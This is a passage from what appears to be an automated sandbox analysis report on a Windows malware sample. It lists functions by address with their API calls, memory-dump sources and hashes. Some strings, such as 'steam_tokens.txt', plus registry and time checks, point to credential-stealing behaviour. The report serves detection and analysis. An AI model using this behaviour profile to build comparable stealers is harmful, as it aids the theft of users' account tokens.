                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: steam_tokens.txt
                                • API String ID: 367037083-401951677
                                • Opcode ID: 52712e99c4051277c393c6ca3d2101dcb048ec86ac0ac077b167efe418a041a3
                                • Instruction ID: 443c0308aeeba5afb7df67a3fbae1e8c2036d00c261fbb17ca30e03d6a844c64
                                • Opcode Fuzzy Hash: 52712e99c4051277c393c6ca3d2101dcb048ec86ac0ac077b167efe418a041a3
                                • Instruction Fuzzy Hash: E8315E71A115465BC762BBBAEC5AEBE7767EF50310F040029FC4ADB312DE25DC068785
                                Function 006C9A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,006C140E), ref: 006C9A9A
                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,006C140E), ref: 006C9AB0
                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,006C140E), ref: 006C9AC7
                                • ReadFile.KERNEL32(00000000,00000000,?,006C140E,00000000,?,?,?,006C140E), ref: 006C9AE0
                                • LocalFree.KERNEL32(?,?,?,?,006C140E), ref: 006C9B00
                                • CloseHandle.KERNEL32(00000000,?,?,?,006C140E), ref: 006C9B07
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 0a0efcee7d150d54189b1e19ff1321578b14b799a3a225ca5e59448661fb0e09
                                • Instruction ID: e3d6b94f5c4b48430d18f4726cab9bd6a4d53957a358ec3f9a4d20f325e971ec
                                • Opcode Fuzzy Hash: 0a0efcee7d150d54189b1e19ff1321578b14b799a3a225ca5e59448661fb0e09
                                • Instruction Fuzzy Hash: 361119B160020AAFEB10DFA9DD88FBB776DFB44744F104269F915A6280EB709D50CBB4
                                Function 006E5AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006E5B14
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA188
                                  • Part of subcall function 006EA173: std::exception::exception.LIBCMT ref: 006EA1AE
                                • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 006E5B7C
                                • memmove.MSVCRT(00000000,?,?), ref: 006E5B89
                                • memmove.MSVCRT(00000000,?,?), ref: 006E5B98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 2052693487-3788999226
                                • Opcode ID: 6f8d22fa38f369044750938dc9f7a746c6496a90995acdab4cf56d36ab5a6fdc
                                • Instruction ID: e799982d61327523ceca6f13e533fd2b2e223a30630ae5603fb5698a872e4891
                                • Opcode Fuzzy Hash: 6f8d22fa38f369044750938dc9f7a746c6496a90995acdab4cf56d36ab5a6fdc
                                • Instruction Fuzzy Hash: AE418271B016189FCF08CF6DC995AAEB7B6EB88714F15826DE906E7344D630DD018B90
                                Function 006D7D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006D7D58
                                  • Part of subcall function 006EA1C0: std::exception::exception.LIBCMT ref: 006EA1D5
                                  • Part of subcall function 006EA1C0: std::exception::exception.LIBCMT ref: 006EA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 006D7D76
                                • std::_Xinvalid_argument.LIBCPMT ref: 006D7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 3310641104-4289949731
                                • Opcode ID: b5e8e2771bd7ca005c274fcae69ad0b85f2f5538a243c9c4a7f35eb8c5e780bf
                                • Instruction ID: 82f9a8d3710cb866f83f2397b6bae6f4159fca9ad2724197dd7665a86754a958
                                • Opcode Fuzzy Hash: b5e8e2771bd7ca005c274fcae69ad0b85f2f5538a243c9c4a7f35eb8c5e780bf
                                • Instruction Fuzzy Hash: D721A2327043044BD724DE6CD881A7AB7E7EFA1750B204A6FE492CB781E771DC4087A6
                                Function 006E33C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E33EF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E33F6
                                • GlobalMemoryStatusEx.KERNEL32 ref: 006E3411
                                • wsprintfA.USER32 ref: 006E3437
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB
                                • API String ID: 2922868504-2651807785
                                • Opcode ID: 1686b5dd5b04f85e6a149541d133e0ee78ee35d08dc852212d5d6532583c2aa1
                                • Instruction ID: fa10bf28df7e2ef72353dc1eca7b0bd62f5b622a6ec612b2b7e0bc90d01e5596
                                • Opcode Fuzzy Hash: 1686b5dd5b04f85e6a149541d133e0ee78ee35d08dc852212d5d6532583c2aa1
                                • Instruction Fuzzy Hash: 9601B571A04658EFDB14DFA8DD49FBEB7B9FB45710F000129FA06E7380DB74590086A5
                                Function 006E926D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit$__getptdfree
                                • String ID: Xuo$Xuo
                                • API String ID: 2640026729-258060891
                                • Opcode ID: 1839987478184787e498da40164a00cb5d17544ed0b779e6e2e01362d7f447a5
                                • Instruction ID: 5b1684148bbb40a9522906a10d926c0dcacdd902cc695d83ca46be04cbe4c3e1
                                • Opcode Fuzzy Hash: 1839987478184787e498da40164a00cb5d17544ed0b779e6e2e01362d7f447a5
                                • Instruction Fuzzy Hash: E501C03291BB91AEDF51AB2E98057EEB3636F10B14F150019E90467780DBA06E81DBE9
                                Function 006DD7B0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,00F1F160,00000000,00020119,?), ref: 006DD7F5
                                • RegQueryValueExA.ADVAPI32(?,00F20658,00000000,00000000,00000000,000000FF), ref: 006DD819
                                • RegCloseKey.ADVAPI32(?), ref: 006DD823
                                • lstrcat.KERNEL32(?,00000000), ref: 006DD848
                                • lstrcat.KERNEL32(?,00F20538), ref: 006DD85C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: 2801a3d77eedb7d7ca9c669cc49984b87f1ad890317ab5336dccdcc8416ee6b0
                                • Instruction ID: 30ab1e9d2e4cd5f3513af2c4f125c896a81ac99101a1034aafce6ad7eb6396cd
                                • Opcode Fuzzy Hash: 2801a3d77eedb7d7ca9c669cc49984b87f1ad890317ab5336dccdcc8416ee6b0
                                • Instruction Fuzzy Hash: 89415EB1A1010DAFCB94EF64EC86FEE7779EB44304F404069B90997251EE30EA85CF95
                                Function 006D7EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006D7F31
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D7F60
                                • StrCmpCA.SHLWAPI(00000000,006F4C3C), ref: 006D7FA5
                                • StrCmpCA.SHLWAPI(00000000,006F4C3C), ref: 006D7FD3
                                • StrCmpCA.SHLWAPI(00000000,006F4C3C), ref: 006D8007
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 8c609dd09647424a6ad1c03f91d22563e407ad8a2120130a6da4c9f29cd963d6
                                • Instruction ID: 892c6a0bf592954add7d443d4eb5f5242c8f7bbef90be937d954d4e370cefde8
                                • Opcode Fuzzy Hash: 8c609dd09647424a6ad1c03f91d22563e407ad8a2120130a6da4c9f29cd963d6
                                • Instruction Fuzzy Hash: 2141A170A0411ADFCB20DF68D484EAEB7B5FF54300B11449AE805DB351EB70EA66CB92
                                Function 006D8050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006D80BB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D80EA
                                • StrCmpCA.SHLWAPI(00000000,006F4C3C), ref: 006D8102
                                • lstrlen.KERNEL32(00000000), ref: 006D8140
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D816F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 23fb1879a9b5c59bb2efe3b60cb712333733159f6872f5a6d6fd093ba00b542b
                                • Instruction ID: e1ac449caeaf11083d7aa9249630718b879bb364761ab88d3b2272dea21c3638
                                • Opcode Fuzzy Hash: 23fb1879a9b5c59bb2efe3b60cb712333733159f6872f5a6d6fd093ba00b542b
                                • Instruction Fuzzy Hash: 0F415A75A00206EFCB21DF79DD48BAABBB5EB44700F14845EA849D7344EF34D94ACB90
                                Function 006E1B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 006E1B72
                                  • Part of subcall function 006E1820: lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E184F
                                  • Part of subcall function 006E1820: lstrlen.KERNEL32(00F06F68), ref: 006E1860
                                  • Part of subcall function 006E1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006E1887
                                  • Part of subcall function 006E1820: lstrcat.KERNEL32(00000000,00000000), ref: 006E1892
                                  • Part of subcall function 006E1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006E18C1
                                  • Part of subcall function 006E1820: lstrlen.KERNEL32(006F4FA0), ref: 006E18D3
                                  • Part of subcall function 006E1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006E18F4
                                  • Part of subcall function 006E1820: lstrcat.KERNEL32(00000000,006F4FA0), ref: 006E1900
                                  • Part of subcall function 006E1820: lstrcpy.KERNEL32(00000000,00000000), ref: 006E192F
                                • sscanf.NTDLL ref: 006E1B9A
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 006E1BB6
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 006E1BC6
                                • ExitProcess.KERNEL32 ref: 006E1BE3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
